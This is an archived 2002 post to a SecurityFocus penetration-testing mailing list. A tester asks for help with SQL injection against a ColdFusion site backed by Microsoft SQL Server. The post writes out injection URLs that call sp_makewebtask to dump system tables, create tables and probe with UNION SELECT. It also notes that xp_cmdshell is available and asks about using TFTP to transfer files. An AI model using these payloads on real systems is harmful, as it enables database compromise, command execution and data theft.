hello pen-tester, I am dealing with a pen-test agains a CFM server with MSSQL as backend. It is vulnerable with direct SQL injection. I figure out that I can create,drop...table, execute xp_cmdshell, sp_makewebtask, so i submit: submit: http://mysite/file.cfm?id=4546;exec sp_makewebtask "C:\winnt\temp\blah.htm","select * from master..sysmessages"-- it's okay, and I want to get "C:\winnt\temp\blah.htm". I submit: http://mysite/file.cfm?id=4567;create table blah (line varchar(8000))-- and then, I submit: http://mysite/file.cfm?id=4567 UNION SELECT line from mrro-- it returns an error complain that "All queries in an SQL statement containing a UNION operator must have an equal number of expressions in their target lists." so I keep adding "line" in my request url (http://mysite/file.cfm?id=4567 UNION SELECT line,line,line from mrro--), finally it returns an error message like this: "[Microsoft][ODBC SQL Server Driver][SQL Server]The text, ntext, or image data type cannot be selected as DISTINCT." question here: who can explain me what happened ? I know there is another way to download or upload files using "tftp", so is there any free "tftp" server for me to use instead of installing a new one ? thank for reading. best regards mrro __________________________________________________ Do you Yahoo!? Yahoo! News - Today's headlines http://news.yahoo.com ---------------------------------------------------------------------------- This list is provided by the SecurityFocus Security Intelligence Alert (SIA) Service. For more information on SecurityFocus' SIA service which automatically alerts you to the latest security vulnerabilities please see: https://alerts.securityfocus.com/
This archive was generated by hypermail 2b30 : Fri Sep 13 2002 - 09:25:12 PDT